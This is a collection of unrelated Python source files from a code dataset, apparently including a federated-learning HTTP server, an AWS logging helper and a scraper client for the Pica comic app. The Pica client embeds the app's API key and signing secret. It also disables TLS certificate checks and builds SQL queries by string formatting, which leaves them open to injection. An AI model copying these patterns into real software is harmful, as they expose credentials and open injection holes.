ax3.patches\r\npourcentage3=['39.3%','10.01%','0.26%','6.66%','2.84%','1.49%','2.1%','0.8%','0.09%','0.09%','0.01%','0.23%','0.75%','0.29%','3.14%','0.4%','3.95%','2.31%','0%','3.92%','14.25%','1.78%','2.12%','2.69%','0.51%']\r\nfor x3, y3 in zip(rects3, pourcentage3):\r\n height = x3.get_height()\r\n ax3.text(x3.get_x() + x3.get_width() / 2, height + 5, y3,ha='center', va='bottom',fontsize=7, color='blue', fontweight='bold')\r\n\r\n#Graphique4\r\ndata4= {\"Pays4\":[' Hawaii',\r\n ' Arizona',\r\n ' California',\r\n ' North California',\r\n ' Nevada',\r\n ' Ohio',\r\n ' Virginia',\r\n ' Florida',\r\n ' Minnesota',\r\n ' Indiana',\r\n ' Texas',\r\n ' Wisconsin',\r\n ' Illinois',\r\n ' Nebraska',\r\n 'Pensylvania'],\r\n\"Distance\":[2818,2818,2272,2272,2159,1977,1954,1943,1500,1477,1454,1454,1431,1318,1295]}\r\ndf4 = DataFrame(data4, columns=[\"Pays4\",\"Distance\"])\r\nfigure4 = plt.Figure(figsize=(4,4), dpi=80)\r\nax4 = figure4.add_subplot(111)\r\nbar4 = FigureCanvasTkAgg(figure4, o3)\r\nbar4.get_tk_widget().place(relx=0.75,rely=0.2,relwidth=0.25, relheight=0.7)\r\ndf4 = df4[[\"Pays4\",\"Distance\"]].groupby(\"Pays4\").sum()\r\ndf4.plot(kind='bar', legend=True, ax=ax4)\r\nax4.set_title('Top 15 des vols')\r\n\r\n\r\nprogramme.mainloop()\r\n","sub_path":"Grand_projet_Tkinter_S2/GP-code-final.py","file_name":"GP-code-final.py","file_ext":"py","file_size_in_byte":17493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"128505242","text":"\nfrom django.conf.urls import url, include\nfrom django.contrib import admin\nfrom faceRecog import views as app_views\nfrom django.contrib.auth import views\n\nurlpatterns = [\n url(r'^user/(?P\\w+)/$', app_views.index, name='indexmain'),\n url(r'^admindashboard$', app_views.admindashboard),\n url(r'^empdashboard$', app_views.empdashboard),\n url(r'^error_image$', app_views.errorImg),\n url(r'^trainer$', app_views.trainer),\n url(r'^detect/(?P\\w+)/$', app_views.detect, name='detect'),\n url(r'^predictaudio$', app_views.predictaudio),\n url(r'^capture$', app_views.capture),\n url(r'^admin/', admin.site.urls),\n url(r'^records/', include('records.urls')),\n]\n","sub_path":"Biometric-Authentication-P3/faceRecog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"561888991","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Python version: 3.6\nimport asyncio\nimport base64\nimport gzip\nimport json\nimport logging\nimport os\nimport socket\nimport sys\nimport time\nimport subprocess\nimport copy\nimport numpy as np\nimport threading\nimport torch\nfrom tornado import httpclient, ioloop, web, httpserver\n\nfrom utils.options import args_parser\nfrom models.Update import LocalUpdate\nfrom models.Fed import FedAvg\nfrom models.test import test_img_total\nfrom utils.util import dataset_loader, model_loader, ColoredLogger\n\nlogging.setLoggerClass(ColoredLogger)\nlogger = logging.getLogger(\"main_fed\")\n\ntorch.manual_seed(0)\nnp.random.seed(0)\n\n# TO BE CHANGED\n# wait in seconds for other nodes to start\nstart_wait_time = 15\n# federated learning server listen port\nfed_listen_port = 8888\n# TO BE CHANGED FINISHED\n\n# NOT TO TOUCH VARIABLES BELOW\ntrigger_url = \"\"\npeer_address_list = []\ng_user_id = 0\nlock = threading.Lock()\nwMap = []\nipMap = {}\nnet_glob = None\nargs = None\ndataset_train = None\ndataset_test = None\ndict_users = []\ntest_users = []\nskew_users = []\ng_start_time = {}\ng_train_time = {}\n\n\n# returns variable from sourcing a file\ndef env_from_sourcing(file_to_source_path, variable_name):\n source = 'source %s && export MYVAR=$(echo \"${%s[@]}\")' % (file_to_source_path, variable_name)\n dump = '/usr/bin/python3 -c \"import os, json; print(os.getenv(\\'MYVAR\\'))\"'\n pipe = subprocess.Popen(['/bin/bash', '-c', '%s && %s' % (source, dump)], stdout=subprocess.PIPE)\n return pipe.stdout.read().decode(\"utf-8\").rstrip()\n\n\n# init: loads the dataset and global model\ndef init():\n global net_glob\n global dataset_train\n global dataset_test\n global dict_users\n global test_users\n global skew_users\n\n dataset_train, dataset_test, dict_users, test_users, skew_users = dataset_loader(args.dataset, args.iid,\n args.num_users)\n if dict_users is None:\n logger.error('Error: unrecognized dataset')\n sys.exit()\n\n img_size = dataset_train[0][0].shape\n net_glob = model_loader(args.model, args.dataset, args.device, args.num_channels, args.num_classes, img_size)\n if net_glob is None:\n logger.error('Error: unrecognized model')\n sys.exit()\n\n\nasync def train(user_id, w_glob, start_time, epochs):\n if user_id is None:\n user_id = await fetch_user_id()\n\n if epochs is None:\n epochs = args.epochs\n else:\n # load w_glob as net_glob\n net_glob.load_state_dict(w_glob)\n net_glob.eval()\n\n logger.info(\"#################### Epoch #\" + str(epochs) + \" start now ####################\")\n\n # training\n train_start_time = time.time()\n local = LocalUpdate(args=args, dataset=dataset_train, idxs=dict_users[user_id - 1])\n w, loss = local.train(net=copy.deepcopy(net_glob).to(args.device))\n train_time = time.time() - train_start_time\n from_ip = get_ip()\n await upload_local_w(user_id, epochs, w, from_ip, start_time, train_time)\n\n\nasync def gathered_global_w(user_id, epochs, w_glob, start_time, train_time):\n w_glob = conver_numpy_value_to_tensor(decompress_data(w_glob))\n net_glob.load_state_dict(w_glob)\n net_glob.eval()\n\n test_start_time = time.time()\n idx = int(user_id) - 1\n idx_total = [test_users[idx], skew_users[0][idx], skew_users[1][idx], skew_users[2][idx], skew_users[3][idx]]\n correct = test_img_total(net_glob, dataset_test, idx_total, args)\n acc_local = torch.div(100.0 * correct[0], len(test_users[idx]))\n # skew 5%\n acc_local_skew1 = torch.div(100.0 * (correct[0] + correct[1]), (len(test_users[idx]) + len(skew_users[0][idx])))\n # skew 10%\n acc_local_skew2 = torch.div(100.0 * (correct[0] + correct[2]), (len(test_users[idx]) + len(skew_users[1][idx])))\n # skew 15%\n acc_local_skew3 = torch.div(100.0 * (correct[0] + correct[3]), (len(test_users[idx]) + len(skew_users[2][idx])))\n # skew 20%\n acc_local_skew4 = torch.div(100.0 * (correct[0] + correct[4]), (len(test_users[idx]) + len(skew_users[3][idx])))\n\n test_time = time.time() - test_start_time\n\n # before start next round, record the time\n filename = \"result-record_\" + str(user_id) + \".txt\"\n # first time clean the file\n if epochs == args.epochs:\n with open(filename, 'w') as f:\n pass\n\n with open(filename, \"a\") as time_record_file:\n current_time = time.strftime(\"%H:%M:%S\", time.localtime())\n total_time = time.time() - start_time\n communication_time = total_time - train_time - test_time\n time_record_file.write(current_time + \"[\" + f\"{epochs:0>2}\" + \"]\"\n + \" \" + str(total_time)[:8]\n + \" \" + str(train_time)[:8]\n + \" \" + str(test_time)[:8]\n + \" \" + str(communication_time)[:8]\n + \" \" + str(acc_local.item())[:8]\n + \" \" + str(acc_local_skew1.item())[:8]\n + \" \" + str(acc_local_skew2.item())[:8]\n + \" \" + str(acc_local_skew3.item())[:8]\n + \" \" + str(acc_local_skew4.item())[:8]\n + \"\\n\")\n\n # start next round of train\n new_epochs = epochs - 1\n if new_epochs > 0:\n # reset a new time for next round\n asyncio.ensure_future(train(user_id, w_glob, time.time(), new_epochs))\n else:\n logger.info(\"########## ALL DONE! ##########\")\n\n\nclass MultiTrainThread(threading.Thread):\n def __init__(self):\n threading.Thread.__init__(self)\n\n def run(self):\n time.sleep(start_wait_time)\n logger.debug(\"start new thread\")\n loop = asyncio.new_event_loop()\n loop.run_until_complete(train(None, None, time.time(), None))\n logger.debug(\"end thread\")\n\n\ndef test(data):\n detail = {\"data\": data}\n return detail\n\n\nasync def load_user_id():\n lock.acquire()\n global g_user_id\n g_user_id += 1\n detail = {\"user_id\": g_user_id}\n lock.release()\n return detail\n\n\nasync def release_global_w(epochs):\n lock.acquire()\n global g_user_id\n global wMap\n g_user_id = 0\n lock.release()\n w_glob = FedAvg(wMap)\n wMap = [] # release wMap after aggregation\n w_glob_compressed = compress_data(convert_tensor_value_to_numpy(w_glob))\n for user_id in ipMap.keys():\n key = str(user_id) + \"-\" + str(epochs)\n start_time = g_start_time.get(key)\n train_time = g_train_time.get(key)\n data = {\n 'message': 'release_global_w',\n 'user_id': user_id,\n 'epochs': epochs,\n 'w_glob': w_glob_compressed,\n 'start_time': start_time,\n 'train_time': train_time,\n }\n json_body = json.dumps(data, sort_keys=True, indent=4, ensure_ascii=False, cls=NumpyEncoder).encode('utf8')\n my_url = \"http://\" + ipMap[user_id] + \":\" + str(fed_listen_port) + \"/trigger\"\n await http_client_post(my_url, json_body, 'release_global_w')\n\n\nasync def average_local_w(user_id, epochs, w, from_ip, start_time, train_time):\n lock.acquire()\n global wMap\n global ipMap\n\n global g_start_time\n global g_train_time\n key = str(user_id) + \"-\" + str(epochs)\n g_start_time[key] = start_time\n g_train_time[key] = train_time\n\n ipMap[user_id] = from_ip\n w = conver_numpy_value_to_tensor(decompress_data(w))\n wMap.append(w)\n lock.release()\n if len(wMap) == args.num_users:\n logger.debug(\"Gathered enough w, average and release them\")\n asyncio.ensure_future(release_global_w(epochs))\n\n\nasync def http_client_post(url, json_body, message=\"None\"):\n logger.debug(\"Start http client post [\" + message + \"] to: \" + url)\n method = \"POST\"\n headers = {'Content-Type': 'application/json; charset=UTF-8'}\n http_client = httpclient.AsyncHTTPClient()\n try:\n request = httpclient.HTTPRequest(url=url, method=method, headers=headers, body=json_body, connect_timeout=300,\n request_timeout=300)\n response = await http_client.fetch(request)\n logger.debug(\"[HTTP Success] [\" + message + \"] SERVICE RESPONSE: %s\" % response.body)\n return response.body\n except Exception as e:\n logger.error(\"[HTTP Error] [\" + message + \"] SERVICE RESPONSE: %s\" % e)\n return None\n\n\nasync def fetch_user_id():\n fetch_data = {\n 'message': 'fetch_user_id',\n }\n json_body = json.dumps(fetch_data, sort_keys=True, indent=4, ensure_ascii=False).encode('utf8')\n response = await http_client_post(trigger_url, json_body, 'fetch_user_id')\n responseObj = json.loads(response)\n detail = responseObj.get(\"detail\")\n user_id = detail.get(\"user_id\")\n return user_id\n\n\nasync def upload_local_w(user_id, epochs, w, from_ip, start_time, train_time):\n convert_tensor_value_to_numpy(w)\n w_glob_compressed = compress_data(convert_tensor_value_to_numpy(w))\n upload_data = {\n 'message': 'upload_local_w',\n 'user_id': user_id,\n 'epochs': epochs,\n 'w': w_glob_compressed,\n 'from_ip': from_ip,\n 'start_time': start_time,\n 'train_time': train_time,\n }\n json_body = json.dumps(upload_data, sort_keys=True, indent=4, ensure_ascii=False, cls=NumpyEncoder).encode('utf8')\n await http_client_post(trigger_url, json_body, 'upload_local_w')\n return\n\n\ndef conver_numpy_value_to_tensor(numpy_data):\n tensor_data = copy.deepcopy(numpy_data)\n for key, value in tensor_data.items():\n tensor_data[key] = torch.from_numpy(np.array(value))\n return tensor_data\n\n\ndef convert_tensor_value_to_numpy(tensor_data):\n numpy_data = copy.deepcopy(tensor_data)\n for key, value in numpy_data.items():\n numpy_data[key] = value.cpu().numpy()\n return numpy_data\n\n\n# compress object to base64 string\ndef compress_data(data):\n encoded = json.dumps(data, sort_keys=True, indent=4, ensure_ascii=False, cls=NumpyEncoder).encode(\n 'utf8')\n compressed_data = gzip.compress(encoded)\n b64_encoded = base64.b64encode(compressed_data)\n return b64_encoded.decode('ascii')\n\n\n# based64 decode to byte, and then decompress it\ndef decompress_data(data):\n base64_decoded = base64.b64decode(data)\n decompressed = gzip.decompress(base64_decoded)\n return json.loads(decompressed)\n\n\nclass NumpyEncoder(json.JSONEncoder):\n def default(self, obj):\n if isinstance(obj, np.ndarray):\n return obj.tolist()\n return json.JSONEncoder.default(self, obj)\n\n\ndef get_ip():\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n try:\n # doesn't even have to be reachable\n s.connect(('10.255.255.255', 1))\n IP = s.getsockname()[0]\n logger.debug(\"Detected IP address: \" + IP)\n except Exception:\n IP = '127.0.0.1'\n finally:\n s.close()\n return IP\n\n\nclass MainHandler(web.RequestHandler):\n\n async def get(self):\n response = {\"status\": \"yes\", \"detail\": \"test\"}\n in_json = json.dumps(response, sort_keys=True, indent=4, ensure_ascii=False).encode('utf8')\n self.set_header(\"Content-Type\", \"application/json\")\n self.write(in_json)\n\n async def post(self):\n data = json.loads(self.request.body)\n status = \"yes\"\n detail = {}\n self.set_header(\"Content-Type\", \"application/json\")\n\n message = data.get(\"message\")\n if message == \"test\":\n detail = test(data.get(\"weight\"))\n elif message == \"fetch_user_id\":\n detail = await load_user_id()\n elif message == \"upload_local_w\":\n await average_local_w(data.get(\"user_id\"), data.get(\"epochs\"), data.get(\"w\"), data.get(\"from_ip\"),\n data.get(\"start_time\"), data.get(\"train_time\"))\n elif message == \"release_global_w\":\n await gathered_global_w(data.get(\"user_id\"), data.get(\"epochs\"), data.get(\"w_glob\"),\n data.get(\"start_time\"), data.get(\"train_time\"))\n\n response = {\"status\": status, \"detail\": detail}\n in_json = json.dumps(response, sort_keys=True, indent=4, ensure_ascii=False).encode('utf8')\n self.write(in_json)\n\n\ndef main():\n global peer_address_list\n global trigger_url\n global args\n\n # parse args\n args = args_parser()\n args.device = torch.device('cuda:{}'.format(args.gpu) if torch.cuda.is_available() and args.gpu != -1 else 'cpu')\n logger.setLevel(args.log_level)\n\n # parse network.config and read the peer addresses\n real_path = os.path.dirname(os.path.realpath(__file__))\n peer_address_var = env_from_sourcing(os.path.join(real_path, \"../fabric-samples/network.config\"), \"PeerAddress\")\n peer_address_list = peer_address_var.split(' ')\n peer_addrs = [peer_addr.split(\":\")[0] for peer_addr in peer_address_list]\n peer_header_addr = peer_addrs[0]\n trigger_url = \"http://\" + peer_header_addr + \":\" + str(fed_listen_port) + \"/trigger\"\n\n # parse participant number\n args.num_users = len(peer_address_list)\n\n # init dataset and global model\n init()\n\n # multi-thread training here\n my_ip = get_ip()\n threads = []\n for addr in peer_addrs:\n if addr == my_ip:\n thread_train = MultiTrainThread()\n threads.append(thread_train)\n\n # Start all threads\n for thread in threads:\n thread.start()\n\n app = web.Application([\n (r\"/trigger\", MainHandler),\n ])\n http_server = httpserver.HTTPServer(app, max_buffer_size=10485760000) # 10GB\n http_server.listen(fed_listen_port)\n logger.info(\"start serving at \" + str(fed_listen_port) + \"...\")\n ioloop.IOLoop.current().start()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"federated-learning/main_fed.py","file_name":"main_fed.py","file_ext":"py","file_size_in_byte":13942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"114881697","text":"# -*- coding: utf-8 -*-\nimport re\nimport os\n\nimport hmac\nimport time\nimport json\nimport uuid\nimport threading\nimport zipfile\nimport urllib3\nimport sqlite3\nimport logging\nimport hashlib\nimport platform\nimport requests\nfrom urllib import parse\nlogging.basicConfig(filename='pica.log',\n level=logging.INFO,\n format='%(asctime)s %(filename)s[line:%(lineno)d] %(message)s',\n datefmt='%m-%d %H:%M:%S',\n filemode=\"w\")\nurllib3.disable_warnings()\nglobal_url = \"https://picaapi.picacomic.com/\"\napi_key = \"C69BAF41DA5ABD1FFEDC6D2FEA56B\"\nsecret_key = \"~n}$S9$lGts=U)8zfL/R.PM9;4[3|@/CEsl~Kk!7?BYZ:BAa5zkkRBL7r|1/*Cr\"\nuuid_s = str(uuid.uuid4()).replace(\"-\", \"\")\nheader = {\n \"api-key\": \"C69BAF41DA5ABD1FFEDC6D2FEA56B\",\n \"accept\": \"application/vnd.picacomic.com.v1+json\",\n \"app-channel\": \"2\",\n \"time\": 0,\n \"nonce\": \"\",\n \"signature\": \"encrypt\",\n \"app-version\": \"2.1.0.4\",\n \"app-uuid\": \"418e56fb-60fb-352b-8fca-c6e8f0737ce6\",\n \"app-platform\": \"android\",\n \"app-build-version\": \"39\",\n \"Content-Type\": \"application/json; charset=UTF-8\",\n \"User-Agent\": \"okhttp/3.8.1\",\n}\nproxies = None\n\n\nclass Pica:\n\n def __init__(self, account, password):\n self.path = \"D:/pic/\" if platform.system() == 'Windows' else \"/mnt/usb/\"\n self.account = account\n self.password = password\n self.header = header.copy()\n self.uuid_s = str(uuid.uuid4()).replace(\"-\", \"\")\n self.header[\"nonce\"] = self.uuid_s\n self.db = sqlite3.connect(\"data.db\")\n self.communicate_db(\"create table account (email text PRIMARY KEY NOT NULL, password text, key text);\")\n self.communicate_db(\"create table crew (id text PRIMARY KEY NOT NULL,name text,data text);\")\n self.check()\n\n def communicate_db(self, sql):\n cur = self.db.cursor()\n try:\n __res = cur.execute(sql).fetchall()\n logging.info(str(__res))\n self.db.commit()\n return __res\n except sqlite3.OperationalError:\n return []\n\n def check(self):\n token = self.communicate_db(\"select key from account where email='{}';\".format(self.account))\n if len(token) == 0:\n token = self.login()\n self.communicate_db(\"insert into account (email, password, key)\" +\n \"values ('{0}', '{1}', '{2}');\".format(self.account, self.password, token))\n return\n token = token[0][0]\n self.header[\"authorization\"] = token\n __res = self.get(global_url + \"users/profile\")\n try:\n __res = __res.json()\n except json.JSONDecodeError:\n logging.error(__res.text)\n raise json.JSONDecodeError\n if __res[\"code\"] != 200:\n token = self.login()\n self.communicate_db(\"update test set key='{0}' where email='{1}';\".format(token, self.account))\n\n def post(self, url, data=None):\n ts = str(int(time.time()))\n self.header[\"time\"] = ts\n self.header[\"signature\"] = self.encrypt(url, ts, \"POST\", self.uuid_s)\n return requests.post(url=url, data=data, headers=self.header, verify=False, proxies=proxies)\n\n def get(self, url):\n ts = str(int(time.time()))\n self.header[\"time\"] = ts\n self.header[\"signature\"] = self.encrypt(url, ts, \"GET\", self.uuid_s)\n header_tmp = self.header.copy()\n header_tmp.pop(\"Content-Type\")\n # print(url)\n # print(self.header)\n while True:\n try:\n return requests.get(url=url, headers=header_tmp, verify=False, proxies=proxies)\n except:\n time.sleep(10)\n\n @staticmethod\n def encrypt(url, ts, method, uuid_ss):\n \"\"\"\n\n :param url: 完整链接:https://picaapi.picacomic.com/auth/sign-in\n :param ts: 要和head里面的time一致, int(time.time())\n :param method: http请求方式: \"GET\" or \"POST\"\n :param uuid_ss: str, len(uuid)==32\n :return: header[\"signature\"]\n \"\"\"\n raw = url.replace(\"https://picaapi.picacomic.com/\", \"\") + str(ts) + uuid_ss + method + api_key\n raw = raw.lower()\n hc = hmac.new(secret_key.encode(), digestmod=hashlib.sha256)\n hc.update(raw.encode())\n return hc.hexdigest()\n\n def login(self):\n api = \"auth/sign-in\"\n url = global_url + api\n send = {\"email\": self.account, \"password\": self.password}\n __a = self.post(url=url, data=json.dumps(send)).text\n logging.info(__a)\n self.header[\"authorization\"] = json.loads(__a)[\"data\"][\"token\"]\n return self.header[\"authorization\"]\n\n def categories(self):\n api = \"categories\"\n url = global_url + api\n return self.get(url)\n\n def block(self, __page, __word):\n \"\"\"\n bl:妹妹系,性轉換,\n \"\"\"\n api = \"comics?page={0}&c={1}&s=ua\".format(__page, parse.quote(__word))\n url = global_url + api\n return self.get(url)\n\n def searchs(self, __page, __word):\n url = global_url + \"comics/search?page={0}&q={1}\".format(__page, parse.quote(__word))\n return self.get(url)\n\n def tags(self, __page, __word):\n url = global_url + \"comics?page={}&t={}\".format(__page, parse.quote(__word)) \n return self.get(url)\n\n def comics(self, __id, __name):\n print(__name, time.ctime())\n api = global_url + \"comics/{0}/eps?\".format(__id) + \"page={0}\"\n url = api.format(1)\n _return = []\n __pages = self.get(url).json()[\"data\"][\"eps\"][\"pages\"]\n for _ in range(1, 2): # __pages + 1\n url = api.format(_)\n __res = self.get(url).json()[\"data\"][\"eps\"][\"docs\"]\n for __ in __res:\n _name = re.sub(\"[|:/*\\\\s!?]*\", \"\", __name + __[\"title\"])\n print(_name)\n _return.append({\"name\": _name, \"fid\": __id, \"order\": __[\"order\"], \"id\": __[\"_id\"]})\n return _return\n\n def comic(self, __order, __id, _name):\n api = global_url + 'comics/{0}/order/{1}/pages'.format(__id, __order) + '?page={0}'\n url = api.format(1)\n _return = []\n __pages = self.get(url).json()[\"data\"][\"pages\"][\"pages\"]\n try:\n os.makedirs(\"D:/pic/{}\".format(_name))\n except FileExistsError:\n pass\n for _ in range(1, __pages + 1): # __pages + 1\n url = api.format(_)\n __res = self.get(url).json()[\"data\"][\"pages\"][\"docs\"]\n for __ in __res:\n _tmp = __[\"media\"]\n file_name = \"D:/pic/{}/{}\".format(_name, _tmp[\"originalName\"])\n if os.path.exists(file_name) and os.path.getsize(file_name) != 0:\n continue\n with open(file_name, \"wb\") as out:\n _pic = self.get_picture(\"https://storage1.picacomic.com/static/\" + _tmp[\"path\"])\n out.write(_pic)\n print(_name, time.ctime(), \"done\")\n return _name, time.ctime(), \"done\"\n\n\n def get_picture(self, url):\n while True:\n try:\n __a = self.get(url)\n if __a.status_code != 200:\n continue\n break\n except requests.exceptions.ConnectionError:\n logging.error(\"get picture failed: \" + url)\n time.sleep(8)\n return __a.content\n\n def search(self, __word):\n api = global_url + \"comics/search?page={0}\" + \"&q={0}\".format(parse.quote(__word))\n url = api.format(1)\n __pages = self.get(url).json()[\"data\"][\"comics\"][\"pages\"]\n _return = []\n for _ in range(1, 3): # __pages + 1\n url = api.format(_)\n __res = self.get(url).json()[\"data\"][\"comics\"][\"docs\"]\n for __ in __res:\n if __[\"likesCount\"] < 200:\n continue\n if __[\"pagesCount\"] / __[\"epsCount\"] > 60 or __[\"epsCount\"] > 10:\n continue\n _return.append({\"name\": __[\"title\"], \"id\": __[\"_id\"]})\n return _return\n\n","sub_path":"pica/pic2.py","file_name":"pic2.py","file_ext":"py","file_size_in_byte":8144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"334266666","text":"from setuptools import setup, find_packages\nfrom os import path\n\nhere = path.abspath(path.dirname(__file__))\n\n# Get the long description from the README file\nwith open(path.join(here, \"README.md\"), mode=\"r\", encoding=\"utf-8\") as f:\n long_description = f.read()\n\nextras_require = {\n 'dev': ([\n 'pytest',\n 'pytest-django',\n 'jsonschema',\n 'flake8',\n 'autopep8'\n ])\n}\n\nsetup(\n name=\"supertokens_jwt_ref\",\n version=\"2.0.0\",\n author=\"Bhumil Sarvaiya, Rishabh Poddar\",\n license=\"MIT\",\n author_email=\"sarvaiyabhumil@gmail.com, rishabh@supertokens.io\",\n description=\"SuperTokens session management solution\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/supertokens/supertokens-django-ref-jwt\",\n packages=find_packages(exclude=[\"contrib\", \"docs\", \"tests*\", \"licenses\", \"requirements\"]),\n classifiers=[\n \"Framework :: Django :: 2.2\",\n \"Framework :: Django\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.7\",\n \"Intended Audience :: Developers\",\n \"Topic :: Internet :: WWW/HTTP :: Session\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n keywords=\"\",\n install_requires=[\n \"django\",\n \"djangorestframework\",\n \"pycryptodome\",\n ],\n python_requires='>=3.7',\n extras_require=extras_require\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"424024200","text":"#!/usr/bin/env python3\n\ndef dehtmlize_line(line):\n state=True\n out_line=\"\"\n for char in line:\n if char=='<':\n state=False\n elif char=='>':\n if state:\n out_line+=char\n state=True\n else:\n if state:\n out_line+=char\n return out_line\n\ndef main(filename):\n for line in open(filename):\n print(dehtmlize_line(line).strip())\n\nif __name__==\"__main__\":\n from sys import argv\n main(argv[-1])\n","sub_path":"Code Snippets/de_htmlizer.py","file_name":"de_htmlizer.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"111237709","text":"N_TESTS = 10\nMAX_A = 10 ** 9\n\nimport os\nimport random\n\nrandom.seed(0)\n\nscript_path = os.path.realpath(__file__)\ndir_path = os.path.dirname(script_path)\ntest_dir = os.path.join(dir_path, 'tests')\n\nif not os.path.exists(test_dir):\n os.mkdir(test_dir)\n\ncurr_test = 1\ndef print_test(a, b):\n global curr_test\n\n assert(curr_test <= N_TESTS)\n assert(-MAX_A <= a <= MAX_A)\n assert(-MAX_A <= b <= MAX_A)\n\n print('printing test %d' % curr_test)\n fname = os.path.join(test_dir, '%03d' % curr_test)\n with open(fname, 'w') as f:\n f.write('%d %d\\n' % (a, b))\n\n curr_test += 1\n\n# sample tests\nprint_test(2, 2)\nprint_test(1, 4)\n\nwhile curr_test <= N_TESTS:\n a = random.randint(-MAX_A, MAX_A)\n b = random.randint(-MAX_A, MAX_A)\n print_test(a, b)\n","sub_path":"problems/practice-sum/testgen.py","file_name":"testgen.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"113750939","text":"#!/usr/bin/python\n\nimport pygame\n\nfrom . import (\n dice,\n )\n\n\nclass Bullet(pygame.sprite.Sprite):\n # Subclass must provide self.damage_roll = (qty, sides)\n\n def __init__(self, velocity, coord):\n super().__init__()\n self.damage = dice.roll(*self.damage_roll)\n self.velocity = velocity\n self.image = pygame.Surface([5, 5])\n self.image.fill((200, 0, 0))\n self.coord = coord\n self.radius = self.rect.width\n\n def update(self, dt):\n \"\"\"Update the Bullet for `dt` milliseconds.\"\"\"\n self.coord.x += self.velocity.xVelocity * (dt / 1000.0)\n self.coord.y += self.velocity.yVelocity * (dt / 1000.0)\n\n @property\n def rect(self):\n r = self.image.get_rect()\n r.x = self.coord.x\n r.y = self.coord.y\n return r\n\n\nclass Stone(Bullet):\n # Damage is 1d6\n # XXX - should wrap this into dice.Roll or DiceSpec\n damage_roll = (1, 3)\n\n\nclass Flint(Bullet):\n damage_roll = (1, 6)\n\n\nclass Dart(Bullet):\n damage_roll = (2, 3)\n","sub_path":"yendor/bullet.py","file_name":"bullet.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"139613682","text":"\"\"\"\nlogging service module\n\"\"\"\nfrom os import environ\nfrom os.path import join, dirname\nfrom datetime import datetime\nimport boto3\n\n__author__ = 'Mechanical Rock'\n__version__ = '0.0.1'\n\n\nclass LoggingService(object):\n \"\"\"\n Logging service for instance reaper actions\n\n :type region: string\n :param region: the aws region\n \"\"\"\n BUCKET_NAME = 'instance-reaper-{}-logging'.format(environ.get('TEAM_NAME'))\n\n def __init__(self, region):\n s3_endpoint = \"http://localhost:4572\" if self.is_local() else None\n self.s3_resource = boto3.resource('s3', endpoint_url=s3_endpoint)\n self.log_key = 'instance-reaper-{}.log'.format(region)\n self.log_file = self.get_local_log_name(self.log_key)\n self.region = region\n\n # ensure log file exists\n bucket = self.s3_resource.Bucket(self.BUCKET_NAME)\n log_exists = False\n for bucket_object in bucket.objects.all():\n if self.log_key == bucket_object.key:\n log_exists = True\n\n if not log_exists:\n self.s3_resource.Object(self.BUCKET_NAME, self.log_key).put()\n\n @staticmethod\n def is_local():\n \"\"\"\n checks if we are in a local environment\n\n :rtype: boolean\n :return: whether the ENV environment variable is set to local\n \"\"\"\n return environ.get(\"ENV\") == \"local\"\n\n def get_log(self):\n \"\"\"\n downloads the log file\n \"\"\"\n self.s3_resource.Bucket(self.BUCKET_NAME).download_file(\n self.log_key, self.log_file)\n\n def write_log(self, message):\n \"\"\"\n writes a log message to the log file in the s3 bucket\n \"\"\"\n with open(self.log_file, \"a\") as reaper_log:\n reaper_log.write(\"{}: {}\\n\".format(datetime.utcnow(), message))\n\n def save_log(self):\n \"\"\"\n saves the newly adapted log file\n \"\"\"\n self.s3_resource.Bucket(self.BUCKET_NAME).upload_file(\n self.log_file, self.log_key)\n\n def log_instance_details(self, instance, cpu_util, net_out, tags):\n \"\"\"\n log the instance details\n\n :type instance: dict\n :param instance: the instance details to be logged\n\n :type cpu_util: int\n :param cpu_util: average cpu utilisation over 3 hours\n\n :type net_out: int\n :param net_out: average network out in kb over 3 hours\n\n :type tags: list\n :param tags: the instance tags\n \"\"\"\n self.write_log(\"*************************************************\")\n self.write_log(\"Evaluating instance with id: {}\".format(\n instance['InstanceId']))\n self.write_log(\"Instance launched at: {}\".format(\n instance['LaunchTime']))\n self.write_log(\"Instance has tags: {}\".format(tags))\n self.write_log(\"CPU utilisation is {}%\".format(cpu_util))\n self.write_log(\"Network out is {}kb\".format(net_out))\n\n def get_local_log_name(self, log_key):\n \"\"\"\n get a file name for log file that can be stored locally or\n on a lambda container.\n\n :type log_key: string\n :param log_key: the file name to be used\n\n :rtype: string\n :return: the relevant file name for the environment\n \"\"\"\n dev_log = join(dirname(dirname(__file__)), 'tmp', log_key)\n lambda_log = '/tmp/{}'.format(log_key)\n\n return dev_log if self.is_local() else lambda_log\n","sub_path":"src/utils/logging_service.py","file_name":"logging_service.py","file_ext":"py","file_size_in_byte":3424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"437485518","text":"import cv2\r\n\r\n# Enable camera\r\ncap = cv2.VideoCapture(0)\r\ncap.set(3, 640)\r\ncap.set(4, 420)\r\n\r\n# import cascade file for facial recognition\r\nfaceCascade = cv2.CascadeClassifier(cv2.data.haarcascades + \"haarcascade_frontalface_default.xml\")\r\neyeCascade = cv2.CascadeClassifier(cv2.data.haarcascades + \"haarcascade_eye_tree_eyeglasses.xml\")\r\n\r\n'''\r\n # if you want to detect any object for example eyes, use one more layer of classifier as below:\r\n eyeCascade = 